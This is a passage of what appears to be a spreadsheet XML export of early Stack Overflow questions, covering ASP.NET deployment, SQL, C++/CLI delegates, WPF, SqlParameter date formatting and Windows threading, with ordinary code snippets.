&lt;p&gt;I have now deployed the following approximation, which you can see in action for every &lt;em&gt;new&lt;/em&gt; saved revision on Community Wiki posts&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;do a &lt;a href="http://www.mathertel.de/Diff/" rel="nofollow"&gt;line based diff&lt;/a&gt; of every revision where the body text changes&lt;/li&gt;
&lt;li&gt;sum the insertion and deletion lines for each revision as "editcount"&lt;/li&gt;
&lt;li&gt;each userid gets sum of "editcount" they contributed&lt;/li&gt;
&lt;li&gt;first revision author gets 2x * "editcount" as initial score, as a primary authorship bonus&lt;/li&gt;
&lt;li&gt;to determine final ownership percentage: each user's edited line count total divided by total number of edited lines in all revisions&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(There are also some guard clauses for common simple conditions like 1 revision, only 1 author, etcetera. The line-based diff makes it fairly speedy to recalc for all revisions; in a typical case of say 10 revisions it's ~50ms.)&lt;/p&gt;
&lt;p&gt;This works fairly well in my testing. It does break down a little when you have small 1 or 2 line posts that several people edit, but I think that's unavoidable. Accepting Joel Neely's answer as closest in spirit to what I went with, and upvoted everything else that seemed workable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to get rid of aspx placeholder files in a ASP.NET web deployment project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a &lt;strong&gt;web deployment project&lt;/strong&gt; in order to precompile my &lt;strong&gt;ASP.NET 3.5 web project&lt;/strong&gt;. It creates a single extra DLL for the code in aspx and ascx files. And, for every aspx file there is a placeholder aspx file (empty) which needs to be copied to the server.&lt;/p&gt;
&lt;p&gt;I'd like to simplify the deployment process. Is there a way (configuring the IIS site and adding some sort of http handlers etc.) to &lt;strong&gt;get rid of these aspx placeholders&lt;/strong&gt;?&lt;/p&gt;
&lt;p&gt;Also, I'd like to know if there is a way to get rid of the &lt;strong&gt;.compiled files&lt;/strong&gt; in the bin folder. It would make the deployment process smoother.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Thanks!&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find information on code blocks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know a good website that summarises what you can do with code blocks (i.e. &amp;lt;% &amp;lt;%= &amp;lt;%# etc) in ASP.Net?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting letters to their greek equivalent in Javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some JSON data from a web service which gives me data like the following&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;blah blah &amp;lt;greek&amp;gt;a&amp;lt;/greek&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I need to be able to convert what is inside the greek tags into their symbol equivalent, using javascript.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When foo and bar is not enough</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you are using placeholder names when programming (not necessary variable names, but labels, mockup names, etc) and foo and bar is not enough, what do you use?&lt;/p&gt;
&lt;p&gt;I guess &lt;em&gt;baz&lt;/em&gt; is rather common as third name, and the &lt;em&gt;lorem ipsum&lt;/em&gt; for longer texts. But then what?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trying to find a simple way to do upload only modified files through FTP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Need to find a way to upload files to my server through FTP. But only the ones that have been modified. 
Is there a simple way of doing that? 
Command line ftp client or script is preferred. 
Thanks, Jonas. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What will be the lifespan of the .Net Framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Will it ever become obsolete?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Display a map in a Windows Form app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I built a Winform app several months ago that schedules appointments for repair techs. I'd like to update the app by adding a map for the customer's address on the customer form, and then print that map on the report the techs take when they leave the office.&lt;/p&gt;
&lt;p&gt;I've been looking around but I haven't found a good solution for this yet.&lt;/p&gt;
&lt;p&gt;I currently have an address for the customer.  What I'd like to do is submit the address to one of the popular online map sites and get a minimap of the locale.  I can &lt;em&gt;almost&lt;/em&gt; do this with Google maps using their embedded link feature.  I can get the following HTML after adding an address to their website:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;iframe width="300" height="300" frameborder="0" scrolling="no" 
   marginheight="0" marginwidth="0" 
   src="http://maps.google.com/maps?hl=en&amp;amp;amp;ie=UTF8&amp;amp;amp;t=h&amp;amp;amp;g=1193+Presque+Isle+Dr,+Port+Charlotte,+FL+33952&amp;amp;amp;s=AARTsJqsWtjYwJ7ucpVS6UU2EInkRk6JLA&amp;amp;amp;ll=27.012108,-82.087955&amp;amp;amp;spn=0.005735,0.006437&amp;amp;amp;z=16&amp;amp;amp;output=embed"&amp;gt;
&amp;lt;/iframe&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My first plan was to simply parse this HTML and insert whichever customer's address was needed in place this address, then show the result in a browser object on the form.  However, if I change the address in the above iframe Google gives me a "Your client does not have permission to get URL ..." message.&lt;/p&gt;
&lt;p&gt;I have no preference on which map service I ultimately use, the important thing is that the solution can't have an associated expenses and its usable from Windows forms.&lt;/p&gt;
&lt;p&gt;Anyone got an ideas/recommendations/resources on how to tackle this?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Results&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;I ended up using the control found &lt;a href="http://www.codeplex.com/VEarthControl"&gt;here&lt;/a&gt;.  I find it an "okay" solution... it's tedious to get working as the code does not work as-is.  I'm pretty stunned to find that none of the popular map APIs support winforms.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to get the minimum or maximum value from an Array of numbers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have an Array of numbers: &lt;code&gt;[2,3,3,4,2,2,5,6,7,2]&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;What is the best way to find the minimum or maximum value in that Array?&lt;/p&gt;
&lt;p&gt;Right now, to get the maximum, I am looping through the Array, and resetting a variable to the value if it is greater than the existing value:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var myArray:Array /* of Number */ = [2,3,3,4,2,2,5,6,7,2];
var maxValue:Number = 0;
for each (var num:Number in myArray)
{
    if (num &amp;gt; maxValue)
        maxValue = num;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This just doesn't seem like the best performing way to do this (I try to avoid loops whenever possible).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detecting whether a file is locked by another process (or indeed the same process)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is how I do it at the moment. I try to open the file with the FileShare set to none. So I want exclusive accesss to the file. If I can't get that then its a good bet somebody else has the file locked.&lt;/p&gt;
&lt;p&gt;There's got to be a better and faster way. Any ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;            try
            {
                using (FileStream fs = File.Open(GetLockFilename(), FileMode.Open, FileAccess.ReadWrite, FileShare.None))
                {
                    fs.Close();
                }
                // The file is not locked
            }
            catch (Exception)
            {
                // The file is locked
            }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is it possible for native class to consume .NET event?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any idea how to initialize .NET delegate that points to method from 'mixed' class instance?&lt;/p&gt;
&lt;p&gt;I have 'mixed' C++ class like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class CppMixClass
{
public:
    CppMixClass(void){
        dotNETclass-&amp;gt;StateChanged += gcnew DotNetClass::ServiceStateEventHandler(&amp;amp;UpdateHealthState);
    }
   ~CppMixClass(void);
   void UpdateState(System::Object^ sender, DotNetClass::StateEventArgs^ e){
       //doSmth
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;DotNetClass is implemented in C#, and Method declaration is OK with delegate.
This line generates error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dotNETclass-&amp;gt;StateChanged += gcnew DotNetClass::ServiceStateEventHandler(&amp;amp;UpdateHealthState);
error C2276: '&amp;amp;' : illegal operation on bound member function expression
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anyone have a clue about a problem?
Maybe coz CppMixClass class is not a pure .NET (ref) class?&lt;/p&gt;
&lt;p&gt;I got this to work when UpdateHealthState is static method, but I need pointer to instance method.&lt;/p&gt;
&lt;p&gt;I tried smth like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dotNETclass-&amp;gt;StateChanged += gcnew DotNetClass::ServiceStateEventHandler(this, &amp;amp;UpdateHealthState);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this obviously doesn't work coz this is not pointer (handle) to .NET (ref) class, (System::Object).&lt;/p&gt;
&lt;p&gt;ServiceStateEventHandler is defined in C# as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public delegate void ServiceStateEventHandler(object sender, ServiceStateEventArgs e);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanx for reading this :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to make "destructive" string methods a-la Ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Ruby, methods which change the object have a bang on the end: &lt;code&gt;string.downcase!&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;In c# you have to do: &lt;code&gt;foo = foo.ToLower()&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Is there a way to make an extension method like:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;foo.ConvertToLower()&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;that would manipulate &lt;code&gt;foo&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;(I think the answer is no since strings are immutable and you can't do a &lt;code&gt;ref this&lt;/code&gt; in an extension method.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Distinct by ID and Latest By Date</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following SQL Statement. I need to select the latest record for each System.Id using the System.RevisedDate&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT     [System.Id],[System.RevisedDate], [System.Title], [System.State], [System.Reason], [System.CreatedDate], [System.WorkItemType], [System.TeamProject], 
                      [Microsoft.VSTS.Scheduling.RemainingWork], [Microsoft.VSTS.Scheduling.CompletedWork], [Microsoft.VSTS.CMMI.Estimate]
FROM         WorkItems
WHERE     ([System.WorkItemType] = 'Change Request') AND ([System.CreatedDate] &amp;gt;= '09/30/2008') AND ([System.TeamProject] NOT LIKE '%Deleted%') AND 
                      ([System.TeamProject] NOT LIKE '%Sandbox%')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can you please help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Losing ODBC connection with SQL Server 2005 Database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of our clients has an application (FoxPro 9) running on top of a SQL Server 2005 backend. Intermittently, they are losing their ODBC connection with the SQL Server database. Below is the initial error information:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Err Msg: Connectivity error: [Microsoft][ODBC SQL Server Driver][DBNETLIB]ConnectionRead (recv()).  &lt;/p&gt;
  &lt;p&gt;ODBC Err Msg: [Microsoft][ODBC SQL Server Driver][DBNETLIB]ConnectionRead (recv()).  &lt;/p&gt;
  &lt;p&gt;SQL State: 01000  &lt;/p&gt;
  &lt;p&gt;ODBC Err No:  10054  &lt;/p&gt;
  &lt;p&gt;ODBC Handle:      1  &lt;/p&gt;
  &lt;p&gt;FoxPro Error No: 1526  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We cannot duplicate this error on command. We have tried any number of solutions to no avail. One such hardware base solution which we found was described in: &lt;a href="http://support.microsoft.com/kb/942861/en-us" rel="nofollow"&gt;http://support.microsoft.com/kb/942861/en-us&lt;/a&gt; &lt;/p&gt;
&lt;p&gt;I mention this because it almost perfectly matches what we have been seeing. However, we have implemented all the workarounds listed in that posting (and in this one &lt;a href="http://support.microsoft.com/kb/948496" rel="nofollow"&gt;http://support.microsoft.com/kb/948496&lt;/a&gt; ) - and the problem still continues. &lt;/p&gt;
&lt;p&gt;This issue seems to show itself after the execution of long running queries, but we are not receiving any timeout errors, either from the application, or from SQL Server. I do not believe that this is the result of an idle timeout, because it sometimes occurs in the middle of an executing program.&lt;/p&gt;
&lt;p&gt;I am not a hardware guy, but both the network, and the server (Windows Server 2003), appear to be fast and well designed. There are times however, when the database server is under significant stress.&lt;/p&gt;
&lt;p&gt;If anyone has any suggestions on things we could try...please let us know!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Abstracted References Between Entities</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;An upcoming project of mine is considering a design that involves (what I'm calling) "abstract entity references". It's quite a departure from a more common data model design, but it may be necessary to achieve the flexibility we want. I'm wondering if other architects have experience with systems like this and where the caveats are.&lt;/p&gt;
&lt;p&gt;The project has a requirement for a to control access to various entities (logically: business objects; physically: database rows) by various people. For example, we might want to create rules like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User Alice is a member of Company Z&lt;/li&gt;
&lt;li&gt;User Bob is the manager of Group Y, which has users Charlie, Dave, and Eve.&lt;/li&gt;
&lt;li&gt;User Frank may enter data for [critical business object] X, and also the [critical business objects] in [critical business object group] U.&lt;/li&gt;
&lt;li&gt;User George is not a member of Company T but may view the reports for Company T.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The idea is that we have a lot of different securable objects, roles, groups, and permissions, and we want a system to handle this. Ideally this system would require little to no coding for new situations once it's launched; it should be very flexible.&lt;/p&gt;
&lt;p&gt;In a "traditional" data design, we might have entities/tables like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User&lt;/li&gt;
&lt;li&gt;Company&lt;/li&gt;
&lt;li&gt;User/Company Cross-Reference&lt;/li&gt;
&lt;li&gt;UserGroup&lt;/li&gt;
&lt;li&gt;User/UserGroup Cross-Reference&lt;/li&gt;
&lt;li&gt;CBO ("Critical Business Object")&lt;/li&gt;
&lt;li&gt;User/CBO Cross-Reference&lt;/li&gt;
&lt;li&gt;CBOGroup&lt;/li&gt;
&lt;li&gt;User/CBOGroup Cross-Reference&lt;/li&gt;
&lt;li&gt;CBO/CBOGroup Cross-Reference&lt;/li&gt;
&lt;li&gt;ReportAccess, which is a cross-reference between User and Company specifically for access to reports&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note the big number of cross-reference tables. This system isn't terribly flexible as any time we want to add a new means of access we'd need to introduce a new cross-reference table; that, in turn, means additional coding.&lt;/p&gt;
&lt;p&gt;The proposed system has all of the major entities (User, Company, CBO) reference a value in a new table called Entity. (In the code we'd probably make all of these entities subclasses of an Entity superclass). Then there's two additional tables that reference Entity
 * Group, which is also an Entity "subclass". 
 * EntityRelation, which is a relation between two entities of any type (including Group). This will probably also have some sort of "Relationship Type" field to explain/qualify the relationship.&lt;/p&gt;
&lt;p&gt;This system, at least at first glance, looks like it would meet a lot of our requirements. We might introduce new Entities down the road, but we'd never need to do additional tables to handle the grouping and relationships between these entities, because Group and EntityRelation can already handle that.&lt;/p&gt;
&lt;p&gt;I'm concerned, however, whether this might not work very well in practice. The relationships between entities would become very complex and might be very hard for people (users and developers alike) to understand them. Also, they'd be very recursive; this would make things more difficult for our SQL-dependent report writing staff.&lt;/p&gt;
&lt;p&gt;Does anyone have experiences with a similar system?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ DLL: Not exposing the entire class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I "hide" parts of a class so that whoever is using the libary does not have to include headers for all the types used in my class. Ie take the MainWindow class below, ho can I have it so when compiled in a static/dynamic libary, whoever is useing the libary does NOT have to include windows.h, ie HWND, CRITICAL_SECTION, LRESULT, etc do not have to be defined.&lt;/p&gt;
&lt;p&gt;I know I could split it into two classes, an abstract class with just the public interface, and an implementation class which is hidden that contains the members that require windows.h.&lt;/p&gt;
&lt;p&gt;The problem here is that the visible class can no longer be created itsself, and an additional create function (eg CreateMainWindow) is required. That is fine in this case since it is most likly that just a single instance created on the heap is wanted but for other classes this is not.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MainWindow
{
    HWND hwnd;
    int width, height;
    std::string caption;
    bool started,exited;
    bool closeRequest;
    unsigned loopThread;
    CRITICAL_SECTION inputLock;
    Input *input;
public:
    static void init_type();
    Py::Object getattr(const char *name);
    MainWindow(int width, int height, std::string caption);
    ~MainWindow();
    bool CloseRequest(const Py::Tuple &amp;amp;args);
    bool CloseRequestReset(const Py::Tuple &amp;amp;args);
    HWND GetHwnd();
    int GetWidth();
    int GetHeight();
    Input* GetInput();
protected:
    unsigned static __stdcall loopThreadWrap(void *arg);
    unsigned LoopThreadMain();
    LRESULT WndProc(UINT msg, WPARAM wParam, LPARAM lParam);
    LRESULT static CALLBACK WndProcWrapper(HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam);
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you return a vector iterator from a variable in a templated class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to return an iterator for a vector in a templated class (I'm not sure if that makes a difference, but I've read that may, so I thought I'd mention it).  The problem is that I get an error about C++ not supporting default-int when I try this.  I've looked online and from what I can see in forums and explanaions, I don't think I'm &lt;em&gt;that&lt;/em&gt; far off, it just won't compile.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template&amp;lt;class T&amp;gt;
class Table
{
public:
  ...
  vector&amp;lt;shared_ptr&amp;lt;vector&amp;lt;T&amp;gt;&amp;gt;&amp;gt;::iterator GetRowIterator();
  //vector&amp;lt;shared_ptr&amp;lt;vector&amp;lt;CellValueType&amp;gt; &amp;gt; &amp;gt;::const_iterator GetRowIterator();
  ...
protected:
  vector&amp;lt;shared_ptr&amp;lt;vector&amp;lt;CellValueType&amp;gt; &amp;gt; &amp;gt; data;  //outside vector is rows, inside vector is columns
  ...
};
vector&amp;lt;shared_ptr&amp;lt;vector&amp;lt;T&amp;gt; &amp;gt; &amp;gt;::const_iterator Table&amp;lt;T&amp;gt;::GetRowIterator()
{
  return data.begin();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The errors that I get are: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;error C2146: syntax error : missing ';' before identifier 'GetRowIterator'
error C4430: missing type specifier - int assumed. Note: C++ does not support default-int
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Edit:&lt;/em&gt;&lt;br/&gt;
Changed the end angle brackets so they are not as close together - same error.&lt;br/&gt;&lt;br/&gt;
Any thoughts as to why this is occurring?&lt;br/&gt;
As always, thanks for advice/help in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I paint Swing Components to a PDF file with iText?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to print my Swing JComponent via iText to pdf. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JComponent com = new JPanel();
com.add( new JLabel("hello") );
PdfWriter writer = PdfWriter.getInstance( document, new FileOutputStream( dFile ) );
document.open( );
PdfContentByte cb = writer.getDirectContent( );
PdfTemplate tp = cb.createTemplate( pageImageableWidth, pageImageableHeight );
Graphics2D g2d = tp.createGraphics( pageImageableWidth, pageImageableHeight, new DefaultFontMapper( ) );
g2d.translate( pf.getImageableX( ), pf.getImageableY( ) );
g2d.scale( 0.4d, 0.4d );
com.paint( g2d );
cb.addTemplate( tp, 25, 200 );
g2d.dispose( );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Unfortunately nothing is shown in the PDF file.
Do you know how to solve this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PageMethod Not Updating - Requires Project Rebuild to be Updated</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the AJAX Toolkit:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        &amp;lt;ajaxToolkit:CascadingDropDown ID="CategoryDDL_C" runat="server" TargetControlID="CategoryDDL"
        Category="Main"  PromptText="Please select a category"  LoadingText="[Loading...]"
        ServiceMethod="MainDDL" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And for the Service Method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[WebMethod]
[System.Web.Script.Services.ScriptMethod]
public static CascadingDropDownNameValue[] MainDDL(string knownCategoryValues, string category)
{
    CascadingDropDownNameValue[] CDDNV = new CascadingDropDownNameValue[1] ;
    CDDNV[0] = new CascadingDropDownNameValue(knownCategoryValues + "NO", "1");
    return CDDNV;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, if I make code changes in the MainDDL method, it is not reflected on the page until I do a Website Rebuild.&lt;/p&gt;
&lt;p&gt;Any clues how I can update the Page Method without doing a full rebuild?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a MVC pattern for C# in WPF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a pattern where in WPF, I can build a simple UI form from an XML like definition file pulled from a database?    &lt;/p&gt;
&lt;p&gt;It would allow the user to enter data into this form, and submit it back. The data would be sent back in an XML structure that would closely/exactly mimic the UI definition. &lt;/p&gt;
&lt;p&gt;The definition should include the data-type, and if it was a required value or not.  I would then like to map these data-types and required values to Data Validation Rules, so the form could not be submitted unless it passes the check.  &lt;/p&gt;
&lt;p&gt;It should also handle the ability to have lists of repeating data.&lt;/p&gt;
&lt;p&gt;I am in the planning stages of this project and have fairly good flexibility in the design at this point, though I am pretty sure I need to stick to the desktop, not web since I may be doing some Office Inter-op stuff as well.&lt;/p&gt;
&lt;p&gt;What technology stack would you recommend?  I think XMAL and WPF may be close to the answer.  &lt;/p&gt;
&lt;p&gt;I have also looked at &lt;a href="http://www.mozilla.org/projects/xul" rel="nofollow"&gt;XUL&lt;/a&gt;, but it doesn't seem ready or useful for C#. (Found this &lt;a href="http://msdn.microsoft.com/en-us/magazine/cc188912.aspx" rel="nofollow"&gt;article&lt;/a&gt; from MSDN in 2002)&lt;/p&gt;
&lt;p&gt;Thank you,&lt;br /&gt;
Keith&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a DesignMode property in WPF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Winforms you can say &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ( DesignMode )
{
  // Do something that only happens on Design mode
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is there something like this in WPF?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using DateTime in a SqlParameter for Stored Procedure, format error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to call a stored procedure (on a SQL 2005 server) from C#, .NET 2.0 using &lt;code&gt;DateTime&lt;/code&gt; as a value to a &lt;code&gt;SqlParameter&lt;/code&gt;.  The SQL type in the stored procedure is 'datetime'.&lt;/p&gt;
&lt;p&gt;Executing the sproc from SQL Management Studio works fine.  But everytime I call it from C# I get an error about the date format.  &lt;/p&gt;
&lt;p&gt;When I run SQL Profiler to watch the calls, I then copy paste the &lt;code&gt;exec&lt;/code&gt; call to see what's going on.  These are my observations and notes about what I've attempted:&lt;/p&gt;
&lt;p&gt;1)  If I pass the &lt;code&gt;DateTime&lt;/code&gt; in directly as a &lt;code&gt;DateTime&lt;/code&gt; or converted to &lt;code&gt;SqlDateTime&lt;/code&gt;, the field is surrounding by a PAIR of single quotes, such as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Date_Of_Birth=N''1/8/2009 8:06:17 PM''
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;2)  If I pass the &lt;code&gt;DateTime&lt;/code&gt; in as a string, I only get the single quotes&lt;/p&gt;
&lt;p&gt;3)  Using &lt;code&gt;SqlDateTime.ToSqlString()&lt;/code&gt; does not result in a UTC formatted datetime string (even after converting to universal time)&lt;/p&gt;
&lt;p&gt;4)  Using &lt;code&gt;DateTime.ToString()&lt;/code&gt; does not result in a UTC formatted datetime string.&lt;/p&gt;
&lt;p&gt;5)  Manually setting the &lt;code&gt;DbType&lt;/code&gt; for the &lt;code&gt;SqlParameter&lt;/code&gt; to &lt;code&gt;DateTime&lt;/code&gt; does not change the above observations.&lt;/p&gt;
&lt;p&gt;So, my questions then, is how on earth do I get C# to pass the properly formatted time in the &lt;code&gt;SqlParameter&lt;/code&gt;?  Surely this is a common use case, why is it so difficult to get working?  I can't seem to convert &lt;code&gt;DateTime&lt;/code&gt; to a string that is SQL compatable (e.g. '2009-01-08T08:22:45')&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;RE: BFree, the code to actually execute the sproc is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using (SqlCommand sprocCommand = new SqlCommand(sprocName))
{
    sprocCommand.Connection = transaction.Connection;
    sprocCommand.Transaction = transaction;
    sprocCommand.CommandType = System.Data.CommandType.StoredProcedure;
    sprocCommand.Parameters.AddRange(parameters.ToArray());
    sprocCommand.ExecuteNonQuery();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To go into more detail about what I have tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;parameters.Add(new SqlParameter("@Date_Of_Birth", DOB));
parameters.Add(new SqlParameter("@Date_Of_Birth", DOB.ToUniversalTime()));
parameters.Add(new SqlParameter("@Date_Of_Birth", 
    DOB.ToUniversalTime().ToString()));
SqlParameter param = new SqlParameter("@Date_Of_Birth", 
    System.Data.SqlDbType.DateTime);
param.Value = DOB.ToUniversalTime();
parameters.Add(param);
SqlParameter param = new SqlParameter("@Date_Of_Birth", 
    SqlDbType.DateTime);
param.Value = new SqlDateTime(DOB.ToUniversalTime());
parameters.Add(param);
parameters.Add(new SqlParameter("@Date_Of_Birth", 
    new SqlDateTime(DOB.ToUniversalTime()).ToSqlString()));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Additional EDIT&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The one I thought most likely to work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SqlParameter param = new SqlParameter("@Date_Of_Birth",  
    System.Data.SqlDbType.DateTime);
param.Value = DOB;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Results in this value in the exec call as seen in the SQL Profiler&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Date_Of_Birth=''2009-01-08 15:08:21:813''
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I modify this to be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Date_Of_Birth='2009-01-08T15:08:21'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works, but it won't parse with pair of single quotes, and it wont convert to a &lt;code&gt;DateTime&lt;/code&gt; correctly with the space between the date and time and with the milliseconds on the end.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update and Success&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I had copy/pasted the code above after the request from below.  I trimmed things here and there to be concise.  Turns out my problem was in the code I left out, which I'm sure any one of you would have spotted in an instant.  I had wrapped my sproc calls inside a transaction.  Turns out that I was simply not doing &lt;code&gt;transaction.Commit()&lt;/code&gt;!!!!!  I'm ashamed to say it, but there you have it.&lt;/p&gt;
&lt;p&gt;I still don't know what's going on with the syntax I get back from the profiler.  A coworker watched with his own instance of the profiler from his computer, and it returned proper syntax.  Watching the very SAME executions from my profiler showed the incorrect syntax.  It acted as a red-herring, making me believe there was a query syntax problem instead of the much more simple and true answer, which was that I need to commit the transaction!  &lt;/p&gt;
&lt;p&gt;I marked an answer below as correct, and threw in some up-votes on others because they did, after all, answer the question, even if they didn't fix my specific (brain lapse) issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Numbers of ways of Rendering in Qt</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone please tell me how many ways are there to render a screen in Qt.Like Show() , QDirectPainter etc...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Django on IronPython</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am interested in getting an install of Django running on IronPython, has anyone had any success getting this running with some level of success?  &lt;/p&gt;
&lt;p&gt;If so can you please tell of your experiences, performance, suggest some tips, resources and gotchas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Controller Base Class User.Identity.Name</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As described in &lt;a href="http://www.asp.net/Learn/mvc/tutorial-13-cs.aspx" rel="nofollow"&gt;this post&lt;/a&gt;, I created an abstract base controller class in order to be able to pass data from a controller to master.page. In this case, I want to lookup a user in my db, querying for User.Identity.Name (only if he is logged in).&lt;/p&gt;
&lt;p&gt;However, I noticed that in this abstract base class the &lt;code&gt;User&lt;/code&gt; property is always &lt;code&gt;null&lt;/code&gt;. What do I have to do to get this working?&lt;/p&gt;
&lt;p&gt;Thanks a lot&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it advantageous to use threads in windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some of the fellows in the office think that when they've added threads to their code that windows will assign these threads to run on different processors of a multi-core or multi-processor machine.   Then when this doesn't happen everything gets blamed on the existence of these threads colliding with one another on said multi-core or multi-processor machine. &lt;/p&gt;
&lt;p&gt;Could someone debunk or confirm this notion?&lt;/p&gt;
</t>
  </si>
  <si>
